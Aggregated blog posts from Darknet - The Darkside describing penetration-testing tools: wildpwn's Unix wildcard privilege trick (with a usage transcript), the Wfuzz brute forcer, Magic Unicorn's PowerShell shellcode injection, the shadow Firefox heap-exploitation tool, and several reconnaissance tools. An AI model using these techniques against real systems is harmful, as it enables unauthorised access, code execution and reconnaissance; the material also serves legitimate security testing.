wildpwn is a Python UNIX wildcard attack tool that helps you generate attacks, based on a paper by Leon Juranic. It’s considered a fairly old-skool attack vector, but it still works quite often.

The simple trick behind this technique is that when using shell wildcards, especially asterisk (*), the UNIX shell will interpret files beginning with a hyphen (-) character as command line argument to be executed by the command/program. That leaves space for some variations of the classic channelling attack.

The practical case in terms of this technique is combining arguments and filenames, as different “channels” into single entity, because of using shell wildcards.

Read the full paper here: Back To The Future: Unix Wildcards Gone Wild

Usage

usage: wildpwn.py [-h] [--file FILE] payload folder

Tool to generate unix wildcard attacks

positional arguments:
  payload      Payload to use: (combined | tar | rsync)
  folder       Where to write the payloads

optional arguments:
  -h, --help   show this help message and exit
  --file FILE  Path to file for taking ownership / change permissions. Use it
               with combined attack only.

Usage Example

$ ls -lh /tmp/very_secret_file
-rw-r--r-- 1 root root 2048 jun 28 21:37 /tmp/very_secret_file

$ ls -lh ./pwn_me/
drwxrwxrwx 2 root root 4,0K jun 28 21:38 .
[...]
-rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_1
-rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_2
[...]

$ python wildpwn.py --file /tmp/very_secret_file combined ./pwn_me/
[!] Selected payload: combined
[+] Done! Now wait for something like: chown uid:gid *  (or)  chmod [perms] * on ./pwn_me/. Good luck!

[...time passes / some cron gets executed...]

# chmod 000 * (for example)

[...back with the unprivileged user...]

$ ls -lha ./pwn_me/
[...]
-rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_1
-rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_2
[...]

$ ls -lha /tmp/very_secret_file
-rwxrwxrwx 1 root root 2048 jun 28 21:38 /tmp/very_secret_file

You can download wildpwn here:

wildpwn.py

OR read more here.

The post wildpwn – UNIX Wildcard Attack Tool appeared first on Darknet - The Darkside.

Wfuzz is a Python based flexible web application brute forcer which supports various methods and techniques to expose web application vulnerabilities. This allows you to audit parameters, authentication, forms with brute-forcing GET and POST parameters, discover unlinked resources such as directories/files, headers and so on.

A brute force attack is a method to determine an unknown value by using an automated process to try a large number of possible values.

Wfuzz was created to facilitate the task in web applications assessments and it is based on a simple concept: it replaces any reference to the keyword FUZZ by the value of a given payload. A payload in Wfuzz is a source of input data.

This simple concept allows any input to be injected in any field of an HTTP request, allowing to perform complex brute force attacks in different web application components such as: parameters, authentication, forms, directories/files, headers, etc.

You can use Wfuzz to find several type of vulnerabilities:

• Predictable credentials
• Predictable sessions identifier (session idʼs)
• Predictable resource location (directories and files)
• Injections
• Path traversals
• Overflows
• Cross site scripting
• Authentication flaws
• Insecure direct object references

Features

Wfuzz was created to facilitate the task in web applications assessments, a tool by pen-testers for pen-testers.

• Recursion (when doing directory discovery)
• Post data brute-forcing
• Header brute-forcing
• Output to HTML (easy for just clicking the links and checking the page, even with postdata!)
• Colored output
• Hide results by return code, word numbers, line numbers, etc.
• Url encoding
• Cookies
• Multithreading
• Proxy support
• All parameter fuzzing

You can download Wfuzz here:

wfuzz-2.1.3.tar.gz

Or read more here.

The post Wfuzz – Web Application Brute Forcer appeared first on Darknet - The Darkside.

Magic Unicorn is a simple tool for using a PowerShell downgrade attack to inject shellcode straight into memory. Based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Usage is simple, just run Magic Unicorn (ensure Metasploit is installed and in the right path) and magic unicorn will automatically generate a PowerShell command that you need to simply cut and paste the PowerShell code into a command line window or through a payload delivery system.

Unicorn is a PowerShell injection tool utilizing Matthew Graebers attack and expanded to automatically downgrade the process if a 64 bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.

You can download Unicorn here:

unicorn-2.3.zip

Or read more here.

The post Unicorn – PowerShell Downgrade Attack appeared first on Darknet - The Darkside.

shadow is a new, extended (and renamed version) of a Firefox heap exploitation tool, which is quite a swiss army knife for Firefox/jemalloc heap exploitation.

If you want to dive in really deep to this tool, and the technicalities behind it check this out – OR’LYEH? The Shadow over Firefox [PDF]

Support

shadow has been tested with the following:

• Windows 8.1 x86-64
• Windows 7 SP1 x86 and x86-64
• WinDBG 6.3.9600.17200 x86 (since Firefox stable is x86-only currently)
• pykd version 0.3.0.36
• Many different Firefox releases, but extensively with: 31.7.0-esr, 35.0.1, 36.0.1, 38.0.5, 39.0, 40.0, 43.0. 44.0.

Usage

When you issue a jemalloc-specific command for the first time, shadow parses all jemalloc metadata it knows about and saves them to a Python pickle file. Subsequent commands use this pickle file instead of parsing the metadata from memory again in order to be faster.

When you know that the state of jemalloc metadata has changed (for example when you have made some allocations or have triggered a garbage collection), use the jeparse command to re-parse the
metadata and re-create the pickle file.

Symbol Support

The symbol command allows you to search for SpiderMonkey and DOM classes (and structures) of specific sizes. This is useful when you’re trying to exploit use-after-free bugs, or when you want to position interesting victim objects to overwrite/corrupt.

In the “auxiliary” directory you can find a small PDB parsing utility named symhex. Run it on “xul.pdb” to generate the Python pickle file that shadow expects in the “pdb” directory (as “pdb/xul-VERSION.pdb.pkl”). Before running symhex make sure you have registered “msdia90.dll”.

You can download shadow here:

shadow-master.zip

Or read more here.

The post shadow – Firefox Heap Exploitation Tool (jemalloc) appeared first on Darknet - The Darkside.

Automater is a URL/Domain, IP Address, and Md5 Hash OSINT tool aimed at making the analysis process easier for intrusion Analysts. Given a target (URL, IP, or HASH) or a file full of targets Automater will return relevant results from sources like the following: IPvoid.com, Robtex.com, Fortiguard.com, unshorten.me, Urlvoid.com, Labs.alienvault.com, ThreatExpert, VxVault, and VirusTotal.

By default, if Automater does not find data available it will not submit the target to that site to get data. If you would like Automater to use an HTTP POST to send target data to a source like IPVoid or URLVoid use –p

There are also new output methods. –o will output to a file in the same format that is printed to screen, -c will output a csv, and –w will output an html file.

Usage

It does take Automater a little longer to run then it used to. That is because a delay of 2 seconds between requests was implemented to ensure sources don’t get overloaded. You can modify this delay with a –d .

./Automater.py -h

usage: Automater.py [-h] [-o OUTPUT] [-w WEB] [-c CSV] [-d DELAY] [-s SOURCE] [--p] target

IP, URL, and Hash Passive Analysis tool

required arguments:

  target                List one IP Addresses, URL or Hash to query or pass
                        the filename of a file containing IP Addresses, URL or
                        Hash to query each separated by a newline.

optional arguments:

  -h, --help            show this help message and exit

  -o OUTPUT, --output OUTPUT This option will output the results to a file.

  -w WEB, --web WEB     This option will output the results to an HTML file.

  -c CSV, --csv CSV     This option will output the results to a CSV file.

  -d DELAY, --delay DELAY This will change the delay to the inputted seconds.
                          Default is 2.

  -s SOURCE, --source SOURCE This option will only run the target against a
                        specific source engine to pull associated domains.
                        Options are defined in the name attribute of the site
                        element in the XML configuration file

  --p                   This option tells the program to post information to
                        sites that allow posting. By default the program will
                        NOT post to sites that require a post.

Automater is now very easily extensible even for those that are not familiar with python. All the sources that are queried and what they are queried for are contained in sites.xml. This must be in the same directory as Automater.py and all the other .py’s that Automater ships with.

You can download Automater here:

TekDefense-Automater-master.zip

Or read more here.

The post Automater – IP & URL OSINT Tool For Analysis appeared first on Darknet - The Darkside.

DMitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU) Linux Command Line program coded purely in C with the ability to gather as much information as possible about a host.

DMitry has a base functionality with the ability to add new functions, the basic functionality of DMitry allows for information to be gathered about a target host from a simple whois lookup on the target to UpTime reports and TCP portscans.

The application is considered a tool to assist in information gathering when information is required quickly by removing the need to enter multiple commands and the timely process of searching through data from multiple sources.

Base functionality is able to gather possible sub-domains, email addresses, uptime information, TCP port scan, WHOIS lookups, and more.

Features

The information is gathered with following methods:

• Perform an Internet Number whois lookup.
• Retrieve possible uptime data, system and server data.
• Perform a SubDomain search on a target host.
• Perform an E-Mail address search on a target host.
• Perform a TCP Portscan on the host target.
• A Modular program allowing user specified modules

Usage

-o filename
     Create an ascii text output of the  results  to  the  "filename"
     specified.   If no output filename is specified then output will
     be saved to "target.txt".  If this option is  not  specified  in
     any  form output will be sent to the standard output (STDOUT) by
     default.   This  option  MUST  trail  all  other  options,  i.e.
     "./dmitry -winseo target".

-i     Perform  an  Internet  Number  whois lookup on the target.  This
     requires that the target be in the form of  a  4  part  Internet
     Number  with  each  octal  seperated using the ‘.’ notation. For
     example, "./dmitry -i 255.255.255.255".

-w     Perform a whois lookup on the ’host’ target.  This requires that
     the  target  be  in  a  named  character  format.   For example,
     "./dmitry -w target" will perform a standard named whois lookup.

-n     Retrieve  netcraft.com  data  concerning the host, this includes
     Operating System, Web  Server  release  and  UpTime  information
     where available.

-s     Perform  a  SubDomain search on the specified target.  This will
     use serveral search engines to attempt to locate sub-domains  in
     the  form  of sub.target.  There is no set limit to the level of
     sub-domain that can be located,  however,  there  is  a  maximum
     string  length of 40 characters (NCOL 40) to limit memory usage.
     Possible subdomains are then reversed to an IP address, if  this
     comes  back  positive  then  the  resulting subdomain is listed.
     However, if the host uses an asterisk in their DNS  records  all
     resolve subdomains will come back positive.

-e     Perform  an  EmailAddress  search on the specified target.  This
     modules works using the same concept as the SubDomain search  by
     attempting  to  locate  possible  e-mail  addresses for a target
     host.  The e-mail addresses may also be for possible sub-domains
     of  the  target  host.  There is a limit to the length of the e-
     mail address set to 50 characters  (NCOL  50)  to  limit  memory
     usage.

-p     Perform  a  TCP  Portscan  on the host target.  This is a pretty
     basic module at the moment, and we do advise users to use  some‐
     thing  like  nmap (www.insecure.org/nmap/) instead.  This module
     will list open, closed and  filtered  ports  within  a  specific
     range.  There will probably be little advancement upon this mod‐
     ule, though there will be some alterations to make it  a  little
     more  user friendly.  There are also other options for this mod‐
     ule that can affect the scan and its relative output.

-f     This option will cause the TCP Portscan module to report/display
     output  of  filtered  ports.   These are usually ports that have
     been filtered and/or closed  by  a  firewall  at  the  specified
     host/target.   This  option  requires  that  the  ’-p’ option be
     passed as a previous option.  For example,  "./dmitry  -pf  tar‐
     get".

-b     This option will cause the TCP Portscan module to output Banners
     if they are received  when  scanning  TCP  Ports.   This  option
     requres  that  the  ’-p’  option be passed as a previous option.
     For example, "./dmitry -pb target".

-t     This sets the Time To Live (TTL) of  the  Portscan  module  when
     scanning individual ports.  This is set to 2 seconds by default.
     This is usually required when scanning a host that has  a  fire‐
     wall and/or has filtered ports which can slow a scan down.

You can download DMitry here:

DMitry-1.3a.tar.gz

Or read more here.

The post DMitry – Deepmagic Information Gathering Tool appeared first on Darknet - The Darkside.

dnmap is a distributed Nmap framework which can hand off Nmap scans to several clients. It reads an already created file with Nmap commands and send those commands to each client connected to it.

The framework use a client/server architecture. The server knows what to do and the clients do it. All the logic and statistics are managed in the server. Nmap output is stored on both server and client.

Usually you would want this if you have to scan a large group of hosts and you have several different internet connections (or friends that want to help you).

Features of the framework

Clients can be run on any computer on Internet. Do not have to be local cluster or anything.
Is uses TLS protocol for encryption.

dnmap_server features

• If the server goes down, clients continue trying to connect until the server gets back online.
• If the server goes down, when you put it up again it will send commands starting from the last command given before the shutdown. You do not need to remember where it was.
• You can add new commands to the original file without having to stop the server. The server will read them automatically.
• If some client goes down, the server will remember which command it was executing and it will re-schedule it for later.
• It will store every detail of the operations in a log file.
• It shows real time statistics about the operation of each client, including:
  • Number of commands executed
  • Last time seen
  • Uptime
  • Version of the client
  • If the client is being run as root or not.
• It calculates the amount of commands executed per minute
• The historic average of the amount of commands executed per minute
• The status of the client (Online, Offline, Executing or Storing)
• You can choose which port to use. Defaults to 46001

dnmap_client features

• If the server goes down, it keeps connecting to it until it’s up again.
• Strip strange characters from the command sent by the server. Tries to avoid command injection vulns.
• It only executes the Nmap command. It deletes the command send by the server and changes it by a known Nmap binary in the system.
• You can pick an alias for your user.
• You can change which port to connect to.
• If the command sent by the server does not have a -oA option, the client add it anyway to the command, so it will always have a local copy of the output.

Security

This framework is NOT intended to be secure or to be used by people you do not trust. As the client will execute any Nmap command you send, the client is trusting you. This was created so your friends can help you in the scan, or to use all your computers at the same time.

The client does not need to be run as root, but be aware that most Nmap scan types need the client to be run as root. If some of your clients are not root, you can still send them TCP connect type of scans for example. But this should be done by you in the Nmap commands file.

You can download dnmap here:

dnmap_v0.6.tgz

Or read more here.

The post dnmap – Distributed Nmap Framework appeared first on Darknet - The Darkside.